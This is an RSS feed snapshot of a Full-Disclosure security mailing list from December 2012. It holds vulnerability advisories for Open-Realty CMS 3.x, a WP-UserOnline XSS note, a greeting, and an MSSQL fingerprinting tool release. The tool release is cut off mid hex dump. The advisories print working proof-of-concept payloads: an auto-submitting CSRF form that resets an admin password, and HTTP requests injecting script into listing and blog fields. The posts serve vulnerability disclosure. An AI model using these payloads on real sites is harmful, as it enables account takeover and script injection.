<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>CHOON.NET Forums - Full-Disclosure</title>
        <description>An unmoderated mailing list for the discussion of security issues. Archive started at 30 March 2011.</description>
        <link>http://choon.net/forum/list.php?23</link>
        <lastBuildDate>Fri, 24 May 2013 22:04:46 +0800</lastBuildDate>
        <generator>Phorum 5.2.19</generator>
        <item>
            <guid>http://choon.net/forum/read.php?23,1701897,1701897#msg-1701897</guid>
            <title>[Full-disclosure] Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1701897,1701897#msg-1701897</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.<br />
<br />
<br />
2. BACKGROUND<br />
<br />
Open-Realty is the world's leading real estate listing marketing and<br />
management CMS application, and has enjoyed being the real estate web<br />
site software of choice for professional web site developers since<br />
2002.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
Open-Realty 3.x versions contain a flaw that allows a remote<br />
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists<br />
because the application does not require multiple steps or explicit<br />
confirmation for sensitive transactions for majority of administrator<br />
functions such as adding new user, assigning user to administrative<br />
privilege. By using a crafted URL, an attacker may trick the victim<br />
into visiting to his web page to take advantage of the trust<br />
relationship between the authenticated victim and the application.<br />
Such an attack could trick the victim into executing arbitrary<br />
commands in the context of their session with the application, without<br />
further prompting or verification.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
3.x<br />
<br />
<br />
5. PROOF-OF-CONCEPT/EXPLOIT<br />
<br />
 &lt;!-- Change Password --&gt;<br />
&lt;form action=&quot;[<a href="http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data&quot"  rel="nofollow">127.0.0.1</a>];<br />
method=&quot;POST&quot;&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;user&amp;#95;id&quot; value=&quot;2&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;user&amp;#95;first&amp;#95;name&quot; value=&quot;Well&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;user&amp;#95;last&amp;#95;name&quot; value=&quot;Smith&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;user&amp;#95;email&quot; value=&quot;hacker&amp;#64;yehg.net&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;phone&quot; value=&quot;123456789&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;mobile&quot; value=&quot;9151403793&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;fax&quot; value=&quot;&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;homepage&quot; value=&quot;http&amp;#58;&amp;#47;&amp;#47;yehg.net&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;info&quot; value=&quot;test&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;edit&amp;#95;user&amp;#95;pass&quot; value=&quot;agent&quot; /&gt;<br />
  &lt;input type=&quot;hidden&quot; name=&quot;edit&amp;#95;user&amp;#95;pass2&quot; value=&quot;agent&quot; /&gt;<br />
  &lt;input type=&quot;submit&quot; value=&quot;Submit form&quot; /&gt;<br />
&lt;/form&gt;<br />
&lt;script&gt;<br />
  document.forms[0].submit();<br />
&lt;/script&gt;<br />
<br />
<br />
6. SOLUTION<br />
<br />
The vendor has not responded to the report since 2012-11-17.<br />
It is recommended that an alternate software package be used in its place.<br />
<br />
<br />
7. VENDOR<br />
<br />
Transparent Technologies Inc.<br />
[<a href="http://www.transparent-support.com"  rel="nofollow">www.transparent-support.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-11-17: Vulnerability Reported<br />
2012-12-25: Vulnerability Disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf"  rel="nofollow">yehg.net</a>]<br />
Open-Realty Home Page: [<a href="http://www.open-realty.org/"  rel="nofollow">www.open-realty.org</a>]<br />
<br />
<br />
#yehg [2012-12-25]<br />
<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Tue, 25 Dec 2012 21:40:27 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1701880,1701880#msg-1701880</guid>
            <title>[Full-disclosure] Merry Christmas (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1701880,1701880#msg-1701880</link>
            <description><![CDATA[ Yes yes, its this time of the year again, everybody going nuts and weather is shite...<br />
<br />
And to share this special time of the year with my beloved Full Disclosure, I dedicate this short spam for you ;)<br />
<br />
Enjoy the holidays and I hope I see some of you at the 29th C3 in Hamburg, Germany!<br />
<br />
Merry Christmas and a happy new year!<br />
<br />
Daniel Preussker<br />
<br />
[ Security Consultant, Network &amp; Protocol Security and Cryptography<br />
[ LPI &amp; Novell Certified Linux Engineer and Researcher<br />
[ +49 178 600 96 30<br />
[ <a href="mailto:&#68;&#97;&#110;&#105;&#101;&#108;&#64;&#80;&#114;&#101;&#117;&#115;&#115;&#107;&#101;&#114;&#46;&#78;&#101;&#116;">&#68;&#97;&#110;&#105;&#101;&#108;&#64;&#80;&#114;&#101;&#117;&#115;&#115;&#107;&#101;&#114;&#46;&#78;&#101;&#116;</a><br />
[ [<a href="http://pgp.mit.edu:11371/pks/lookup?op=get&amp;search=0x87E736968E490AA1"  rel="nofollow">pgp.mit.edu</a>]<br />
<br />
<br />
PS: too bad Mayas were wrong :(_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>Daniel Preussker</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Tue, 25 Dec 2012 21:25:33 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1701879,1701879#msg-1701879</guid>
            <title>[Full-disclosure] Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1701879,1701879#msg-1701879</link>
            <description><![CDATA[ 1. OVERVIEW<br />
<br />
Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site<br />
Scripting (XSS).<br />
<br />
<br />
2. BACKGROUND<br />
<br />
Open-Realty is the world's leading real estate listing marketing and<br />
management CMS application, and has enjoyed being the real estate web<br />
site software of choice for professional web site developers since<br />
2002.<br />
<br />
<br />
3. VULNERABILITY DESCRIPTION<br />
<br />
Multiple parameters are not properly sanitized, which allows attacker<br />
to conduct Cross Site Scripting attack. This may allow an attacker to<br />
create a specially crafted URL that would execute arbitrary script<br />
code in a victim's browser.<br />
<br />
<br />
4. VERSIONS AFFECTED<br />
<br />
3.x<br />
<br />
<br />
5. PROOF-OF-CONCEPT/EXPLOIT<br />
<br />
/admin/ajax.php (parameter: title, full_desc, ta)<br />
<br />
///////////////////////////////////////////////////////<br />
<br />
POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1<br />
Host: localhost<br />
Content-Length: 574<br />
Origin: [<a href="http://localhost"  rel="nofollow">localhost</a>]<br />
X-Requested-With: XMLHttpRequest<br />
Content-Type: application/x-www-form-urlencoded<br />
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;<br />
<br />
edit=7305&amp;title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&amp;state=AK&amp;zip=222&amp;country=&amp;neighborhood=&amp;price=&amp;beds=&amp;baths=&amp;floors=&amp;year_built=&amp;garage_size=&amp;sq_feet=&amp;lot_size=&amp;prop_tax=&amp;status=Active&amp;mls=&amp;full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&amp;seotitle=test-7002&amp;edit_active=yes&amp;mlsexport=no&amp;or_owner=2&amp;notes=66&amp;address=aaa&amp;city=aaa&amp;state=AK&amp;zip=222&amp;country=&amp;neighborhood=&amp;price=&amp;beds=&amp;baths=&amp;floors=&amp;year_built=&amp;garage_size=&amp;sq_feet=&amp;lot_size=&amp;prop_tax=&amp;status=Active&amp;mls=&amp;home_features%5B%5D=&amp;community_features%5B%5D=&amp;openhousedate=<br />
<br />
///////////////////////////////////////////////////////<br />
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1<br />
Host: localhost<br />
Proxy-Connection: keep-alive<br />
Content-Length: 112<br />
Origin: [<a href="http://localhost"  rel="nofollow">localhost</a>]<br />
X-Requested-With: XMLHttpRequest<br />
Content-Type: application/x-www-form-urlencoded<br />
Referer: [<a href="http://localhost/admin/index.php?action=edit_blog_post&amp;id=65"  rel="nofollow">localhost</a>]<br />
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;<br />
<br />
blogID=65&amp;title=about+us&amp;ta='&quot;&gt;&lt;script&gt;alert('Error')&lt;/script&gt;&amp;description=&amp;keywords=&amp;status=1&amp;seotitle=about-us<br />
///////////////////////////////////////////////////////<br />
<br />
<br />
6. SOLUTION<br />
<br />
The vendor has not responded to the report since 2012-11-17.<br />
It is recommended that an alternate software package be used in its place.<br />
<br />
<br />
7. VENDOR<br />
<br />
Transparent Technologies Inc.<br />
[<a href="http://www.transparent-support.com"  rel="nofollow">www.transparent-support.com</a>]<br />
<br />
<br />
8. CREDIT<br />
<br />
Aung Khant, [<a href="http://yehg.net"  rel="nofollow">yehg.net</a>], YGN Ethical Hacker Group, Myanmar.<br />
<br />
<br />
9. DISCLOSURE TIME-LINE<br />
<br />
2012-11-17: Vulnerability Reported<br />
2012-12-25: Vulnerability Disclosed<br />
<br />
<br />
10. REFERENCES<br />
<br />
Original Advisory URL:<br />
[<a href="http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss"  rel="nofollow">yehg.net</a>]<br />
Open-Realty Home Page: [<a href="http://www.open-realty.org/"  rel="nofollow">www.open-realty.org</a>]<br />
<br />
<br />
#yehg [2012-12-25]<br />
<br />
---------------------------------<br />
Best regards,<br />
YGN Ethical Hacker Group<br />
Yangon, Myanmar<br />
[<a href="http://yehg.net"  rel="nofollow">yehg.net</a>]<br />
Our Lab | [<a href="http://yehg.net/lab"  rel="nofollow">yehg.net</a>]<br />
Our Directory | [<a href="http://yehg.net/hwd"  rel="nofollow">yehg.net</a>]<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>YGN Ethical Hacker Group</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Tue, 25 Dec 2012 21:25:33 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1699530,1699530#msg-1699530</guid>
            <title>[Full-disclosure] Persistent XSS vulnerability in WP-UserOnline (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1699530,1699530#msg-1699530</link>
            <description><![CDATA[ Hello list!<br />
<br />
in 2010 I've disclosed multiple vulnerabilities (Cross-Site Scripting and <br />
Full path disclosure) in WordPress plugin WP-UserOnline <br />
(http://securityvulns.ru/Ydocument162.html, <br />
[<a href="http://seclists.org/fulldisclosure/2010/Jul/8"  rel="nofollow">seclists.org</a>]). And recently I've disclosed <br />
the exploit for persistent XSS vulnerability in WP-UserOnline. It must be <br />
interesting for those who want to test this vulnerability.<br />
<br />
Exploit:<br />
<br />
[<a href="http://websecurity.com.ua/uploads/2012/WP-UserOnline.txt"  rel="nofollow">websecurity.com.ua</a>]<br />
<br />
This perl exploit I've developed at 26.04.2010.<br />
<br />
As I've wrote earlier, vulnerable are WP-UserOnline 2.62 and previous <br />
versions. After my informing the developer released WP-UserOnline 2.70 (at <br />
07.05.2010). In version 2.70 he fixed XSS, but not Full path disclosure <br />
vulnerabilities.<br />
<br />
Best wishes &amp; regards,<br />
MustLive<br />
Administrator of Websecurity web site<br />
[<a href="http://websecurity.com.ua"  rel="nofollow">websecurity.com.ua</a>] <br />
<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>MustLive</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Tue, 25 Dec 2012 05:43:29 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1698135,1698135#msg-1698135</guid>
            <title>[Full-disclosure] [TOOL RELEASE] SQL Fingerprint powered by ENG++ Technology [Version 1.33.23-170308] (no replies)</title>
            <link>http://choon.net/forum/read.php?23,1698135,1698135#msg-1698135</link>
            <description><![CDATA[ Hello, everybody.<br />
<br />
I am very happy to announce the Perl version of SQL Fingerprint (Christmas Release).<br />
<br />
[Description]<br />
Microsoft SQL Server fingerprinting can be a time consuming process, because it involves trial and error methods to determine the exact version. Intentionally inserting an invalid input to obtain a typical error message or using certain alphabets that are unique for certain server are two of the many ways to possibly determine the version, but most of them require authentication, permissions and/or privileges on Microsoft SQL Server to succeed.<br />
<br />
Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and determine the exact Microsoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism (Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft SQL Server version. It is a tool intended to be used by:<br />
	• Database Administrators<br />
	• Database Auditors<br />
	• Database Owners<br />
	• Penetration Testers<br />
<br />
Having over FIVE HUNDRED unique versions within its fingerprint database, ESF.pl currently supports fingerprinting for:<br />
	• Microsoft SQL Server 2000<br />
	• Microsoft SQL Server 2005<br />
	• Microsoft SQL Server 2008<br />
	• Microsoft SQL Server 2012<br />
<br />
ESF.pl re-invented the techniques used by several public tools (SQLPing Tool by Chip Andrews, Rajiv Delwadia and Michael Choi, and SQLVer Tool by Chip Andrews). ESF.pl shows the MAPPED VERSION and PATCH LEVEL (i.e., Microsoft SQL Server 2008 SP1 (CU5)) instead of showing only the RAW VERSION (i.e., Microsoft SQL Server 10.0.2746). ESF.pl also has the ability to show the MOST LIKELY version, based on its sophisticated Scoring Algorithm Mechanism, and allows to determine vulnerable andunpatched Microsoft SQL Server better than many of public and commercial tools.<br />
<br />
This version is a completely rewritten version in Perl, making ESF.pl much more portable than the previous binary version (Win32), and its original purpose is to be used as a tool to perform automated penetration test. This version also includes the followingMicrosoft SQL Server versions to its fingerprint database:<br />
	• Microsoft SQL Server 2012 SP1 (CU1)<br />
	• Microsoft SQL Server 2012 SP1<br />
	• Microsoft SQL Server 2012 SP1 CTP4<br />
	• Microsoft SQL Server 2012 SP1 CTP3<br />
	• Microsoft SQL Server 2012 SP0 (CU4)<br />
	• Microsoft SQL Server 2012 SP0 (MS12-070)<br />
	• Microsoft SQL Server 2012 SP0 (CU3)<br />
	• Microsoft SQL Server 2012 SP0 (CU2)<br />
	• Microsoft SQL Server 2012 SP0 (CU1)<br />
	• Microsoft SQL Server 2012 SP0 (MS12-070)<br />
	• Microsoft SQL Server 2012 SP0 (KB2685308)<br />
	• Microsoft SQL Server 2012 RTM<br />
<br />
To achieve an accurate and much more reliable version fingerprinting, ESF.pl employes the following steps, mimicking a valid negotiation between the CLIENT and the SERVER:<br />
<br />
	• SSRP Client Unicast Request (CLNT_UCAST_EX)<br />
	• SSRP Client Unicast Instance Request (CLNT_UCAST_INST)<br />
	• TDS Pre-Login Request (PRELOGIN)<br />
<br />
	NOTE: ESF.pl IS NOT a SQLi tool, and has no ability to perform such task.<br />
<br />
[Manual Page]<br />
NAME<br />
    ESF.pl - SQL Fingerprint powered by *ENG++ Technology*<br />
<br />
VERSION<br />
    This document describes ESF.pl [Version 1].<br />
<br />
USAGE<br />
    &quot;ESF.pl host [options]&quot;<br />
<br />
DESCRIPTION<br />
    Microsoft SQL Server fingerprinting can be a time consuming process,<br />
    because it involves trial and error methods to determine the exact<br />
    version. Intentionally inserting an invalid input to obtain a typical<br />
    error message or using certain alphabets that are unique for certain<br />
    server are two of the many ways to possibly determine the version, but<br />
    most of them require authentication, permissions and/or privileges on<br />
    Microsoft SQL Server to succeed.<br />
<br />
    Instead, ESF.pl uses a combination of crafted packets for SQL Server<br />
    Resolution Protocol (&quot;SSRP&quot;) and Tabular Data Stream Protocol (&quot;TDS&quot;)<br />
    (protocols natively used by Microsoft SQL Server) to accurately perform<br />
    version fingerprinting and determine the exact Microsoft SQL Server<br />
    version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism<br />
    (powered by *Exploit Next Generation++ Technology*), which is a much<br />
    more reliable technique to determine the Microsoft SQL Server version.<br />
    It is a tool intended to be used by:<br />
    *   Database Administrators<br />
    *   Database Auditors<br />
    *   Database Owners<br />
    *   Penetration Testers<br />
<br />
    Having over &quot;FIVE HUNDRED&quot; unique versions within its fingerprint<br />
    database, ESF.pl currently supports fingerprinting for:<br />
    *   Microsoft SQL Server 2000<br />
    *   Microsoft SQL Server 2005<br />
    *   Microsoft SQL Server 2008<br />
    *   Microsoft SQL Server 2012<br />
<br />
    ESF.pl re-invented the techniques used by several public tools (SQLPing<br />
    Tool by *Chip Andrews*, *Rajiv Delwadia* and *Michael Choi*, and SQLVer<br />
    Tool by *Chip Andrews*) (see &quot;SEE ALSO&quot; for further information). ESF.pl<br />
    shows the &quot;MAPPED VERSION&quot; and &quot;PATCH LEVEL&quot; (i.e., Microsoft SQL Server<br />
    2008 SP1 (CU5)) instead of showing only the &quot;RAW VERSION&quot; (i.e.,<br />
    Microsoft SQL Server 10.0.2746). ESF.pl also has the ability to show the<br />
    *MOST LIKELY* version, based on its sophisticated Scoring Algorithm<br />
    Mechanism, and allows to determine &quot;vulnerable&quot; and &quot;unpatched&quot;<br />
    Microsoft SQL Server better than many of public and commercial tools.<br />
<br />
    This version is a completely rewritten version in Perl, making ESF.pl<br />
    much more portable than the previous binary version (Win32), and its<br />
    original purpose is to be used as a tool to perform automated<br />
    penetration test. This version also includes the following Microsoft SQL<br />
    Server versions to its fingerprint database:<br />
    *   Microsoft SQL Server 2012 SP1 (CU1)<br />
    *   Microsoft SQL Server 2012 SP1<br />
    *   Microsoft SQL Server 2012 SP1 CTP4<br />
    *   Microsoft SQL Server 2012 SP1 CTP3<br />
    *   Microsoft SQL Server 2012 SP0 (CU4)<br />
    *   Microsoft SQL Server 2012 SP0 (MS12-070)<br />
    *   Microsoft SQL Server 2012 SP0 (CU3)<br />
    *   Microsoft SQL Server 2012 SP0 (CU2)<br />
    *   Microsoft SQL Server 2012 SP0 (CU1)<br />
    *   Microsoft SQL Server 2012 SP0 (MS12-070)<br />
    *   Microsoft SQL Server 2012 SP0 (KB2685308)<br />
    *   Microsoft SQL Server 2012 RTM<br />
<br />
        *NOTE: ESF.pl &quot;IS NOT&quot; a *SQLi* tool, and has no ability to perform<br />
        such task.*<br />
<br />
  Fingerprinting Steps<br />
    As described in &quot;DESCRIPTION&quot;, ESF.pl uses a combination of crafted<br />
    packets for &quot;SSRP&quot; and &quot;TDS&quot; to accurately perform version<br />
    fingerprintfing. To achieve an accurate and much more reliable version<br />
    fingerprinting, ESF.pl employes the following steps, mimicking a valid<br />
    negotiation between the CLIENT and the SERVER:<br />
<br />
    1) &quot;SSRP&quot; &quot;Client Unicast Request&quot; (CLNT_UCAST_EX)<br />
        This step attempts to gather the Microsoft SQL Server single<br />
        instance or even multiple instances (see &quot;MULTIPLE SQL SERVER<br />
        INSTANCES WARNING&quot; for further information), and the respective<br />
        &quot;TDS&quot; communication port(s) - the &quot;TDS&quot; communication port for each<br />
        instances can be dynamic or default (see &quot;DYNAMIC SQL SERVER TCP<br />
        PORT WARNING&quot; and &quot;DEFAULT SQL SERVER TCP PORT WARNING&quot; for further<br />
        information).<br />
<br />
            *NOTE: If this step fails, the &quot;STEP 2&quot; is not performed and the<br />
            &quot;STEP 3&quot; will use &quot;TDS&quot; default communication port only.*<br />
<br />
    2) &quot;SSRP&quot; &quot;Client Unicast Instance Request&quot; (CLNT_UCAST_INST)<br />
        This step attempts to use the information gathered by *step 1* to<br />
        collect, parse and match information for a single instances or for<br />
        multiple instances (see &quot;MULTIPLE SQL SERVER INSTANCES WARNING&quot; for<br />
        further information). Once the collecting, parsing and matching is<br />
        done, the fingerprinting data is stored to be validated by the<br />
        sophisticated Scoring Algorithm Mechanism (powered by *Exploit Next<br />
        Generation++ Technology*).<br />
<br />
            *NOTE: If the &quot;STEP 1&quot; fails, this step is not performed.*<br />
<br />
    3) &quot;TDS&quot; &quot;Pre-Login Request&quot; (PRELOGIN)<br />
        This step attempts to use the information gathered by *step 1* to<br />
        collect, parse and match information for a single instances running<br />
        on &quot;TDS&quot; default coommunication port (see &quot;DEFAULT SQL SERVER TCP<br />
        PORT WARNING&quot; for further information) or for multiple instances<br />
        (see &quot;MULTIPLE SQL SERVER INSTANCES WARNING&quot; for further<br />
        information) running on &quot;TDS&quot; dynamic communication port(s) (see<br />
        &quot;DYNAMIC SQL SERVER TCP PORT WARNING&quot; for further information. Once<br />
        the collecting, parsing and matching is done, the fingerprinting<br />
        data is stored to be validated by the sophisticated Scoring<br />
        Algorithm Mechanism (powered by *Exploit Next Generation++<br />
        Technology*).<br />
<br />
            *NOTE: If &quot;STEP 1&quot; fails, this step will use &quot;TDS&quot; default<br />
            communication port only.*<br />
<br />
  SSRP<br />
    As described in &quot;[MS-SQLR]: SQL Server Resolution Protocol&quot;<br />
    specification document (see &quot;SEE ALSO&quot; for further information).<br />
<br />
    1) &quot;1.3 Overview&quot;<br />
        &quot;The first case is used for the purpose of determining the<br />
        communication endpoint information of a particular database<br />
        instance, whereas the second case is used for enumeration of<br />
        database instances in the network and to obtain the endpoint<br />
        information of each instance.&quot; (*page 8*)<br />
<br />
        &quot;The SQL Server Resolution Protocol does not include any facilities<br />
        for authentication, protection of data, or reliability. The SQL<br />
        Server Resolution Protocol is always implemented on top of the UDP<br />
        Transport Protocol [RFC768].&quot; (*page 8*)<br />
<br />
    2) &quot;1.9 Standards Assignments&quot;<br />
        &quot;The client always sends its request to UDP port 1434 of the server<br />
        or servers.&quot; (*page 10*)<br />
<br />
    3) &quot;2.2.2 CLNT_UCAST_EX&quot;<br />
        &quot;The CLNT_UCAST_EX packet is a unicast request that is generated by<br />
        clients that are trying to determine the list of database instances<br />
        and their network protocol connection information installed on a<br />
        single machine. The client generates a UDP packet with a single<br />
        byte, as shown in the following diagram.&quot; (*page 11*)<br />
<br />
    4) &quot;2.2.3 CLNT_UCAST_INST&quot;<br />
        &quot;The CLNT_UCAST_INST packet is a request for information related to<br />
        a specific instance. The structure of the request is as follows.&quot;<br />
        (*page 12*)<br />
<br />
    According to the previous quotes, the &quot;SSRP&quot; *is used for the purpose of<br />
    determining the communication endpoint information of a particular<br />
    database instance*, which *does not include any facilities for<br />
    authentication*, and both &quot;SSRP&quot; &quot;CLNT_UCAST_EX Request&quot; and &quot;SSRP&quot;<br />
    &quot;CLNT_UCAST_INST Request&quot; can be used *for the purpose of determining<br />
    the communication endpoint information*.<br />
<br />
    Based on this analysis, it is possible to determine the Microsoft SQL<br />
    Server version using the &quot;SSRP&quot; &quot;CLNT_UCAST_EX Request&quot; and/or &quot;SSRP&quot;<br />
    &quot;CLNT_UCAST_INST Request&quot;. The version is available within the &quot;SSRP&quot;<br />
    &quot;CLNT_UCAST_EX Response&quot; and/or &quot;SSRP&quot; &quot;CLNT_UCAST_INST Response&quot;, and<br />
    it is a gratuitous information sent from SERVER to CLIENT to ensure they<br />
    will establish a communication correctly, using the correct database<br />
    instance and the same dialect by both CLIENT and SERVER.<br />
<br />
    Here is a &quot;SSRP&quot; &quot;CLNT_UCAST_INST Request&quot; and &quot;SSRP&quot; &quot;CLNT_UCAST_INST<br />
    Response&quot; sample traffic dump between the ESF.pl and a Microsoft SQL<br />
    Server 2008 SP1:<br />
<br />
    &quot;SSRP&quot; &quot;CLNT_UCAST_INST Request&quot;<br />
         0000   04 4d 53 53 51 4c 53 45 52 56 45 52              .MSSQLSERVER<br />
<br />
    &quot;SSRP&quot; &quot;CLNT_UCAST_INST Response&quot;<br />
         0000   05 77 00 53 65 72 76 65 72 4e 61 6d 65 3b 53 45  .w.ServerName;SE<br />
         0010   52 56 45 52 30 34 3b 49 6e 73 74 61 6e 63 65 4e  RVER04;InstanceN<br />
         0020   61 6d 65 3b 4d 53 53 51 4c 53 45 52 56 45 52 3b  ame;MSSQLSERVER;<br />
         0030   49 73 43 6c 75 73 74 65 72 65 64 3b 4e 6f 3b 56  IsClustered;No;V<br />
         0040   65 72 73 69 6f 6e 3b 31 30 2e 30 2e 32 35 33 31  ersion;10.0.2531<br />
         0050   2e 30 3b 74 63 70 3b 31 34 33 33 3b 6e 70 3b 5c  .0;tcp;1433;np;\<br />
         0060   5c 53 45 52 56 45 52 30 34 5c 70 69 70 65 5c 73  \SERVER04\pipe\s<br />
         0070   71 6c 5c 71 75 65 72 79 3b 3b                    ql\query;;<br />
<br />
    As demonstrated above, the information within the &quot;SSRP&quot; &quot;CLNT_UCAST_EX<br />
    Response&quot; represents the version for Microsoft SQL Server 2008 SP1<br />
    (*10.0.2531*), as well as many interesting information.<br />
<br />
        *NOTE: no authentication and gratuitous information.*<br />
<br />
  TDS<br />
    As described in &quot;[MS-TDS]: Tabular Data Stream Protocol&quot; specification<br />
    document (see &quot;SEE ALSO&quot; for further information).<br />
<br />
    1) &quot;2.2.1.1 Pre-Login&quot;<br />
        &quot;Before a login occurs, a handshake denominated pre-login occurs<br />
        between client and server, setting up contexts such as encryption<br />
        and MARS-enabled.&quot; (*page 17*)<br />
<br />
    2) &quot;2.2.2.1 Pre-Login Response&quot;<br />
        &quot;The pre-login response is a tokenless packet data stream. The data<br />
        stream consists of the response to the information requested by the<br />
        client pre-login message.&quot; (*page 18*)<br />
<br />
    3) &quot;2.2.4.1 Tokenless Stream&quot;<br />
        &quot;As shown in the previous section, some messages do not use tokens<br />
        to describe the data portion of the data stream. In these cases, all<br />
        the information required to describe the packet data is contained in<br />
        the packet header. This is referred to as a tokenless stream and is<br />
        essentially just a collection of packets and data.&quot; (*page 24*)<br />
<br />
    4) &quot;2.2.6.4 PRELOGIN&quot;<br />
        &quot;A message sent by the client to set up context for login. The<br />
        server responds to a client PRELOGIN message with a message of<br />
        packet header type 0x04 and the packet data containing a PRELOGIN<br />
        structure.&quot; (*page 59*)<br />
<br />
        &quot;[TERMINATOR] [0xFF] [Termination token.]&quot; (*page 61*)<br />
<br />
        &quot;TERMINATOR is a required token, and it MUST be the last token of<br />
        PRELOGIN_OPTION. TERMINATOR does not include length and bits<br />
        specifying offset.&quot; (*page 61*)<br />
<br />
    According to the previous quotes, the &quot;TDS&quot; &quot;Pre-Login&quot; is just a<br />
    handshake, i.e., the &quot;TDS&quot; &quot;Pre-Login&quot; is a *tokenless packet data<br />
    stream* of the *pre-authentication state* to establish the negotiation<br />
    between the CLIENT and the SERVER - as described in &quot;Figure 3: Pre-login<br />
    to post-login sequence&quot; (*page 103*).<br />
<br />
    Based on this analysis, it is possible to determine the Microsoft SQL<br />
    Server version during the &quot;TDS&quot; &quot;Pre-Login&quot; handshake. It is an<br />
    undocumented feature, but it is not a bug or a leakage, in fact, it is<br />
    more likely to be an &quot;AS IS&quot; embedded feature that allows CLIENT to<br />
    establish a negotiation with SERVER. The version is available within the<br />
    &quot;TDS&quot; &quot;Pre-Login Response&quot; packet data stream, and it is a gratuitous<br />
    information sent from SERVER to CLIENT to ensure they will establish a<br />
    communication correctly, using the correct database instance and the<br />
    same dialect by both CLIENT and SERVER.<br />
<br />
    Here is a *tokenless packet data stream* sample traffic dump of a &quot;TDS&quot;<br />
    &quot;Pre-Login&quot; handshake between the ESF.pl and a Microsoft SQL Server 2008<br />
    SP1:<br />
<br />
    &quot;TDS&quot; &quot;Pre-Login Request&quot;<br />
         0000   12 01 00 2f 00 00 01 00 00 00 1a 00 06 01 00 20<br />
         0010   00 01 02 00 21 00 01 03 00 22 00 04 04 00 26 00<br />
         0020   01 ff 09 00 00 00 00 00 01 00 b8 0d 00 00 01<br />
<br />
    &quot;TDS&quot; &quot;Pre-Login Response&quot;<br />
         0000   04 01 00 2b 00 00 01 00 00 00 1a 00 06 01 00 20<br />
